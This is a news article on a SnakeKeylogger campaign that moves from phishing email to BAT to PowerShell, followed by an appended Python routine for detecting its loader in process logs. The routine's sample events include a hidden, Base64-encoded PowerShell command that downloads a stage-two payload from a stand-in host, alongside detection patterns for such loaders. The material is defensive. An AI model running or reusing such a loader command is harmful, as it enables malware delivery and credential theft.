
SnakeKeylogger Surfaces with New Email-to-PowerShell Attack Chain

A fresh campaign deploying SnakeKeylogger is targeting users with weaponized emails that lead to the execution of PowerShell scripts and ultimately exfiltrate sensitive data. Security analysts warn that the threat now blends social engineering with native Windows scripting to evade detection.

Emails purporting to be from “CPA-Payment Files” or similar remittance services carry attachments, most often ISO or ZIP files. Once opened, these contain a malicious BAT file that launches PowerShell commands to fetch a secondary payload. That payload is the SnakeKeylogger executable, which then installs itself, harvests data and communicates with its command-and-control (C2) servers. The malware captures keystrokes, browser credentials, system metadata and cookies before transmitting encrypted logs.
This attack chain was first observed on 7 October 2025, when several recipients reported emails titled “remittance advice for the payment dated 07-Oct-2025”. The attackers rely on both obfuscation and native scripting to stay under the radar.

Earlier iterations of SnakeKeylogger have used phishing campaigns that deliver the malware via Excel or HTA files. In one such campaign, Fortinet researchers documented how an Excel attachment exploited the CVE-2017-0199 vulnerability to drop a PowerShell loader, which in turn deployed the keylogger. That version already sought to steal browser-saved credentials, clipboard contents, and keystroke data.
Over time, the malware evolved: later variants introduced persistence via scheduled tasks, registry run keys, or blending with system processes to mask their presence. In some campaigns, attackers impersonated defence contractors to lend legitimacy to their email lures.


The current campaign adds two noteworthy refinements: first, the use of ISO and ZIP containers to bypass email filters that block Office documents; second, the invocation of PowerShell via obfuscated BAT scripts to reduce the forensic footprint. Analysts trace much of the attack logic to embedded Base64 strings that are decoded at runtime to build download URLs and commands. Once the loader is in place, it stages SnakeKeylogger inside trusted processes to avoid triggering heuristics tied to newly spawned binaries.

Exfiltration occurs through HTTP POST requests disguised as legitimate telemetry to PHP endpoints on attacker-controlled domains. To evade network defenders, exfiltration intervals are randomized, and collected data is queued locally if the C2 endpoint is unavailable. The data is encrypted with AES-256-GCM, using a key derived from the machine’s GUID and a salt. If detection occurs, the campaign may fall back to queuing the data for a later retry.

Defence recommendations from cybersecurity firms include enforcing stringent email content filters, setting a restrictive PowerShell execution policy, and enabling PowerShell script block logging. Endpoint protection tools should monitor registry changes, command-line invocations, and anomalous network traffic, particularly POST requests to domains not tied to legitimate corporate services.
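As an added example, not code from the article or from any vendor it cites, the following Python triage routine applies the command-line monitoring advice above to process-creation records: it flags cmd.exe spawning PowerShell (the BAT launcher hop), hidden-window flags, and Base64 blobs that decode to a download URL built at runtime. The event field names and the example.invalid URLs are constructed for the demonstration.

```python
import base64
import binascii
import re

# Loader traits from the article: encoded command, inline Base64, hidden-window flags, decoded URLs.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)


def decode_blob(blob: str) -> str:
    """-EncodedCommand is UTF-16LE, FromBase64String payloads usually ASCII; accept only printable ASCII."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return ""
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isascii() and text.isprintable():
            return text
    return ""


def analyse(event: dict) -> dict:
    """Score one process-creation record with fields parent, image, cmdline (constructed schema)."""
    cmd, findings, urls = event["cmdline"], [], []
    if event.get("parent", "").lower() == "cmd.exe" and "powershell" in event["image"].lower():
        findings.append("powershell spawned by cmd.exe (BAT launcher pattern)")
    if HIDDEN.search(cmd):
        findings.append("hidden-window / no-profile flags")
    blobs = set(ENC_FLAG.findall(cmd)) | set(B64_BLOB.findall(cmd))
    for text in sorted({decode_blob(b) for b in blobs} - {""}):
        findings.append("base64 decodes to: " + text[:60])
        urls.extend(URL.findall(text))
    if urls:
        findings.append("download URL assembled at runtime")
    return {"score": len(findings), "findings": findings, "urls": urls}


# Constructed sample events (not captured from the campaign): a BAT-style hop with a
# runtime-decoded URL, an inline FromBase64String blob, and a benign scheduled script.
SAMPLE_EVENTS = [
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode("Invoke-WebRequest http://example.invalid/stage2.bin".encode("utf-16-le")).decode()},
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe -c [Convert]::FromBase64String('"
     + base64.b64encode(b"http://example.invalid/gate.php").decode() + "')"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]
```

Feed it Sysmon Event ID 1 or Windows 4688 records mapped to the same three fields; anything with a non-zero score and a decoded URL is worth a closer look against the POST-to-unknown-domain traffic the article describes.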



Notice an issue?

Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com. We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.
